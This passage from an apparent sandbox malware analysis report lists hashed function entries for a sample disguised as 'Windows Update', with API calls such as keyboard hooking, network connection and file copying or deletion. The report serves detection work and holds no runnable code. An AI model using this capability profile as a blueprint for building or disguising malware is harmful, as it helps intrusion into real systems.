                                                                                  • Opcode ID: 5ac0911813b7797a4805f23a40231082e6e8d07f332783495ed91613d7171267
                                                                                  • Instruction ID: 474c9022159523cecd79d1fb84bb3e5148380b7e4507467737b035ccada85f35
                                                                                  • Opcode Fuzzy Hash: 5ac0911813b7797a4805f23a40231082e6e8d07f332783495ed91613d7171267
                                                                                  • Instruction Fuzzy Hash: 6711BE755097C09FDB228B25DC85B52BFB4EF06224F0984DFED858F663C265A808DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00644BBA, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNEL32(?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00644C1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 28ada0963fa7f52508781b1e3ba449f882085cc9644b685b532ff5ed66f5b357
                                                                                  • Instruction ID: 0750cd7e66760a2bccb295c1df4f327403baed19430299c531640ff7044077f6
                                                                                  • Opcode Fuzzy Hash: 28ada0963fa7f52508781b1e3ba449f882085cc9644b685b532ff5ed66f5b357
                                                                                  • Instruction Fuzzy Hash: D311B6715053809FDB11CF25DC85B96BFE8EF06220F0984EAED49CB252D235A844CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00640F82, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ioctlsocket.WS2_32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 00640FDB
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ioctlsocket
                                                                                  • String ID:
                                                                                  • API String ID: 3577187118-0
                                                                                  • Opcode ID: e11df48c93611b72335f6ce7c2b0c282309e6228658aa7fee476640f93bf140e
                                                                                  • Instruction ID: 77a696079368e067dfae894a4c451da41d7e0d6e9696a9e941c068fec90b96c8
                                                                                  • Opcode Fuzzy Hash: e11df48c93611b72335f6ce7c2b0c282309e6228658aa7fee476640f93bf140e
                                                                                  • Instruction Fuzzy Hash: C7112571500340EFFB21CF10CC85FAAFBA8EF04720F14846AEE089B241C675A944CBB1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006418EC, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Atom
                                                                                  • String ID:
                                                                                  • API String ID: 2154973765-0
                                                                                  • Opcode ID: 7c7c4384d0bc1de07df62e3e2a2dcdf6cd6825092ebcdce8606f3b1b6b348e4d
                                                                                  • Instruction ID: 17dd3700a2fe820f2b6986de5c86b6b42cccd9d52c3fb1a1da04cbe54c3eb8f5
                                                                                  • Opcode Fuzzy Hash: 7c7c4384d0bc1de07df62e3e2a2dcdf6cd6825092ebcdce8606f3b1b6b348e4d
                                                                                  • Instruction Fuzzy Hash: 581194715093809FD712CB15DC95B92BFA8EF06224F0880DBED898F653D275A848CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00645B46, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00645BAC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: 5752946eccd535afb9252eb1e7a2e350bcd8a180b701f3df70aa6d18685a7af8
                                                                                  • Instruction ID: cd0bdd96871edfb43683372ea47f8fa0f835a7da8af5a10c9d51fca2cdb52aa9
                                                                                  • Opcode Fuzzy Hash: 5752946eccd535afb9252eb1e7a2e350bcd8a180b701f3df70aa6d18685a7af8
                                                                                  • Instruction Fuzzy Hash: 11119D711097C09FD7128B25DC55B92BFF4EF42220F1884EAED898B663C265A848CB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064304E, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetAdaptersAddresses.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006430AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdaptersAddresses
                                                                                  • String ID:
                                                                                  • API String ID: 2506852604-0
                                                                                  • Opcode ID: 81aafeeefeb47482ab0af83c4231bf9517474530240a08c8a57f4397b343d481
                                                                                  • Instruction ID: bf2ccc816564710faddcb7d8bdf26ff3679189e46da6acfd284966be43ac64d5
                                                                                  • Opcode Fuzzy Hash: 81aafeeefeb47482ab0af83c4231bf9517474530240a08c8a57f4397b343d481
                                                                                  • Instruction Fuzzy Hash: 0011E571100704EFFB218F41DC45FAAFBA8EF04B20F14855AFE495A251C671EA49CBB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006444FA, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?,00000E40), ref: 00644563
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 37ffd06030bcf0fae757d26bba3a43196b6b3de7a34bc78bb3617dd87cc77433
                                                                                  • Instruction ID: 82f8959a3559e2af2a746200ab5c70810d59aff9096890b6e01008e2f6c1938c
                                                                                  • Opcode Fuzzy Hash: 37ffd06030bcf0fae757d26bba3a43196b6b3de7a34bc78bb3617dd87cc77433
                                                                                  • Instruction Fuzzy Hash: 15110471500300EFFB20DF15DC86FB6FBA8DF04720F14809AFE485A281D6B5AA48CA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: recv
                                                                                  • String ID:
                                                                                  • API String ID: 1507349165-0
                                                                                  • Opcode ID: 3bcdec447006df79a2a0ef1bcde06ed1e8dcb758ce04e950d7daeed28fc831c3
                                                                                  • Instruction ID: 0c5e38f58cf98f74fe956b5f5a92670903407cb81290fd18a2e82221eebc0d57
                                                                                  • Opcode Fuzzy Hash: 3bcdec447006df79a2a0ef1bcde06ed1e8dcb758ce04e950d7daeed28fc831c3
                                                                                  • Instruction Fuzzy Hash: 72119175509380AFDB22CF15DD44F92FFB4EF56224F0884AAED888B552C375A858CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643146, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetPerAdapterInfo.IPHLPAPI(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0064319F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AdapterInfo
                                                                                  • String ID:
                                                                                  • API String ID: 3405139893-0
                                                                                  • Opcode ID: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
                                                                                  • Instruction ID: d467b12c0334c77e288756ecd7f83e4c0d8b9e1b579f3c607f6e0d5f4c887863
                                                                                  • Opcode Fuzzy Hash: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
                                                                                  • Instruction Fuzzy Hash: 3B112671100300EFFB208F01CC85FA6FBA8EF04720F14845AFD055B341D670AA04CAB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006413C0, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: 6d7c11f0d44aa680cc959849fb00ad57d8319a4dbb7badaa1f5b035404582111
                                                                                  • Instruction ID: cf4668eacf80d18332f4c2d2e02f82f7fcf367ee1c4d428d221ba36bd94210b1
                                                                                  • Opcode Fuzzy Hash: 6d7c11f0d44aa680cc959849fb00ad57d8319a4dbb7badaa1f5b035404582111
                                                                                  • Instruction Fuzzy Hash: ED119071405380AFDB21CF51DC44B92FFF4EF06320F0888AAED898B662C375A458DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064358E, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RasConnectionNotificationA.RASAPI32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 006435E7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConnectionNotification
                                                                                  • String ID:
                                                                                  • API String ID: 1402429939-0
                                                                                  • Opcode ID: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
                                                                                  • Instruction ID: 6091e54062cc11434852b2a507e25e6a4d62e5822d1ae74a272cdff6d073ac77
                                                                                  • Opcode Fuzzy Hash: 0f959498f943b9aa4976108490f2853957a1f6b9e77138b1b0b1c79e39c0effe
                                                                                  • Instruction Fuzzy Hash: F811D275500704EFFB209F11DC85FA6FBA8EF04720F14849AFE099B381D675AA45CAB6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064521A, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CopyFileW.KERNEL32(?,?,?), ref: 00645262
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 9b7668330b66db7be74251c386800c238f413099dc4e4a7944e58c296f4f0aca
                                                                                  • Instruction ID: cf240d8460f77218d7d790c951834f9e092eae95b7743f42922430aed76abd9f
                                                                                  • Opcode Fuzzy Hash: 9b7668330b66db7be74251c386800c238f413099dc4e4a7944e58c296f4f0aca
                                                                                  • Instruction Fuzzy Hash: 1111A1726007009FEB20CF25DC85B97FBE8EF14320F08846ADC0ADB742E671E904CA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642763, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,?,?,?), ref: 006427C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: c924603e2b79a8e603ea3a341cf7aa5491353b7ae9f807d554feb435d300b2c9
                                                                                  • Instruction ID: 970b7363366dd59f23fb5f974691382b4e3f410e66573d1c9f7bebe3ac990fac
                                                                                  • Opcode Fuzzy Hash: c924603e2b79a8e603ea3a341cf7aa5491353b7ae9f807d554feb435d300b2c9
                                                                                  • Instruction Fuzzy Hash: 791191715093C0AFDB228F11DC54B52FFB4EF16220F0884DAED854B663D365A818DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642BA0, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: 0225f2ca8270464d24664f9aa76bdccb6db88aeca1f5739277d8bf83e18c5230
                                                                                  • Instruction ID: 2c7875f1dbeaaf53964456e925da4b284b44c01fde191de80b5ee5518f7747c8
                                                                                  • Opcode Fuzzy Hash: 0225f2ca8270464d24664f9aa76bdccb6db88aeca1f5739277d8bf83e18c5230
                                                                                  • Instruction Fuzzy Hash: 3811A3725083849FE7118F15DC85A96FFA4EF06320F0884DEED858B262C275A848DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BD42, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileType.KERNEL32(?,00000E40,105056BB,00000000,00000000,00000000,00000000), ref: 0011BD95
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileType
                                                                                  • String ID:
                                                                                  • API String ID: 3081899298-0
                                                                                  • Opcode ID: c5c516620b012e5ee2f7b4c5878f0fa80c6ec1c17bebc5424553b12a3968469d
                                                                                  • Instruction ID: 4165842432a82d670c3d73660b04932d3dd4dcaa6e124450be816e6e7d57b94e
                                                                                  • Opcode Fuzzy Hash: c5c516620b012e5ee2f7b4c5878f0fa80c6ec1c17bebc5424553b12a3968469d
                                                                                  • Instruction Fuzzy Hash: FD01DE75504300EFFB24DF51EC85BA6FB98EF04724F1484AAEE089B281C774A9448AB2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642CE0, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindClose.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642D34
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: 64ea29fd8f61b73555e7ddbd9a7e44a7a16a685c7fc11ff9579ff894a75761cf
                                                                                  • Instruction ID: 4bee1058cf0f8550fcffa4856dfe98c22a81b2d7661e87dfd0032f0c2267e5a1
                                                                                  • Opcode Fuzzy Hash: 64ea29fd8f61b73555e7ddbd9a7e44a7a16a685c7fc11ff9579ff894a75761cf
                                                                                  • Instruction Fuzzy Hash: CF11C8755093C49FD7228F15DC95B52FFB4EF06220F0880DBED858B253D275A908CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006420E6, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00642131
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExtentPoint32Text
                                                                                  • String ID:
                                                                                  • API String ID: 223599850-0
                                                                                  • Opcode ID: 1039d5baa8b79dd981e3e836e577b5efed861dfac9c5fb75ced8435433fd16d4
                                                                                  • Instruction ID: c77024bf0bacbbbc5dd362d163c49b96083d3810cff9bc3b77aa8adb6752b371
                                                                                  • Opcode Fuzzy Hash: 1039d5baa8b79dd981e3e836e577b5efed861dfac9c5fb75ced8435433fd16d4
                                                                                  • Instruction Fuzzy Hash: BD117C71500300DFEB20CF15C885BA6FBE8EB14760F5884AAEE098B312D271E804CAA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011BB6A, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesExW.KERNEL32(?,?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0011BBAA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 628302c5acc3ca6642ae89c2143987673a254d028fabb4826a4a601b4440ddd4
                                                                                  • Instruction ID: eef7940d5867cb1cf583c3f9065342dcc0a4c8615d72490aa9e4d434e80b27d0
                                                                                  • Opcode Fuzzy Hash: 628302c5acc3ca6642ae89c2143987673a254d028fabb4826a4a601b4440ddd4
                                                                                  • Instruction Fuzzy Hash: E601C0716083008FEB24CF25DC85B96FBE4EF04320F0884BADD09CB655D771E844CA65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00643E8A, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00643ED6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connect
                                                                                  • String ID:
                                                                                  • API String ID: 3144859779-0
                                                                                  • Opcode ID: 8c315047ad039747a71a545c0cb29befa968151c130757300c6aea3f337959ca
                                                                                  • Instruction ID: a9900e1e8b6a2a18085d0beaae6193907104bdba1ee7affd919c86782c3324a9
                                                                                  • Opcode Fuzzy Hash: 8c315047ad039747a71a545c0cb29befa968151c130757300c6aea3f337959ca
                                                                                  • Instruction Fuzzy Hash: 0E115A35500700DFEB20CF55D884B96FFE5EF04310F0888AAED498A622D371A918DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00644BDE, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetFileAttributesW.KERNEL32(?,?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00644C1B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 0bf06219053f49ed91976dd29aaf9bd995a798eee6daf3d0da0ca5b5c6b70cbd
                                                                                  • Instruction ID: 907c92be77635490f0db9faf3b62c9bfd3d281402ac1f5f4d86e0ef4aa57c9ce
                                                                                  • Opcode Fuzzy Hash: 0bf06219053f49ed91976dd29aaf9bd995a798eee6daf3d0da0ca5b5c6b70cbd
                                                                                  • Instruction Fuzzy Hash: 53019E71601340DFEB10CF29DC86BA6FBD8EF04320F0884AADD09CB742DA75E844CA61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0011A172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • gethostname.WS2_32(?,00000E40,?,?), ref: 0011A1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110366565.000000000011A000.00000040.00000001.sdmp, Offset: 0011A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11a000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: gethostname
                                                                                  • String ID:
                                                                                  • API String ID: 144339138-0
                                                                                  • Opcode ID: 2977488326712d6f0abb4703d40df9b971432876aefabc247b1bf13aff1ce1df
                                                                                  • Instruction ID: d3a48229efe2bbd1fa1098c773bb6b46fdde7d2d652ccba4ecc097dfc414c0de
                                                                                  • Opcode Fuzzy Hash: 2977488326712d6f0abb4703d40df9b971432876aefabc247b1bf13aff1ce1df
                                                                                  • Instruction Fuzzy Hash: D3017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D235B915CAE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00641866, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetWindowsHookExA.USER32(?,00000E40,?,?), ref: 006418B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: b1bbc1e522f96d30760df08a73264f0d7e47e6176f07c8a62487ac009a2db4db
                                                                                  • Instruction ID: 94e3a859b3b43b0ec31d416c789e350429faaf139e14024a388a1352e3145769
                                                                                  • Opcode Fuzzy Hash: b1bbc1e522f96d30760df08a73264f0d7e47e6176f07c8a62487ac009a2db4db
                                                                                  • Instruction Fuzzy Hash: 20017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D235B915CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006454EA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • K32GetModuleFileNameExW.KERNEL32(?,00000E40,?,?), ref: 0064553A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 514040917-0
                                                                                  • Opcode ID: 3d0d1c98e6cf517f3b2192d7f093522fda5c13403b4114f408803b905dbe1db9
                                                                                  • Instruction ID: c3e359d4c8a64d68cf04d7c9d2d0619424f0fb39accf08ff49269ac8297a2e2d
                                                                                  • Opcode Fuzzy Hash: 3d0d1c98e6cf517f3b2192d7f093522fda5c13403b4114f408803b905dbe1db9
                                                                                  • Instruction Fuzzy Hash: D3017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D235B915CAE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 006426C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(?,?), ref: 0064271F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2154376794-0
                                                                                  • Opcode ID: b8b2b2511bc534b1aa66922d3ba770851c24e6115c4838d03d0714d7d516898d
                                                                                  • Instruction ID: e8f6e84e16ed42de3a583577b8dc4e4c0d08a040bd9e33bc90bf3e22c4a7c8a4
                                                                                  • Opcode Fuzzy Hash: b8b2b2511bc534b1aa66922d3ba770851c24e6115c4838d03d0714d7d516898d
                                                                                  • Instruction Fuzzy Hash: 9E11A1755087809FD721CF15DC49B92FFA4EF16320F09809AED854B263D275A808CB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0064133A, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateFileMappingW.KERNELBASE(?,00000E40,?,?), ref: 0064138A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFileMapping
                                                                                  • String ID:
                                                                                  • API String ID: 524692379-0
                                                                                  • Opcode ID: 54d6800063eff1a8c663bfc368ca3d720d11eca43e4b0fa4b9ea6c7a862fc2ee
                                                                                  • Instruction ID: efa59adf86f1ddacd5a7c4631d5acf51ff7099629bc1d1678af489a1eb1bffe5
                                                                                  • Opcode Fuzzy Hash: 54d6800063eff1a8c663bfc368ca3d720d11eca43e4b0fa4b9ea6c7a862fc2ee
                                                                                  • Instruction Fuzzy Hash: 58017171900600ABE310DF16DD86B66FBA8FB88A20F14816AED089B741D335B915CAE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00642DC6, Relevance: 1.5, APIs: 1, Instructions: 47fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DeleteFileW.KERNEL32(?,105056BB,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 00642E00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2110930139.0000000000640000.00000040.00000001.sdmp, Offset: 00640000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_640000_Windows Update.jbxd
                                                                                  Similarity
                                                                                  • API ID: DeleteFile
                                                                                  • String ID:
                                                                                  • API String ID: 4033686569-0
                                                                                  • Opcode ID: c9b74aef713f5b23203fe9b7ef4494c99556a4f096054f6e5a6690efcf1cb9c4
                                                                                  • Instruction ID: e37b1ab98f9fac58fa554d7ff1f2b949707472e3396cecf4c59d3c2f5b363ff2
                                                                                  • Opcode Fuzzy Hash: c9b74aef713f5b23203fe9b7ef4494c99556a4f096054f6e5a6690efcf1cb9c4
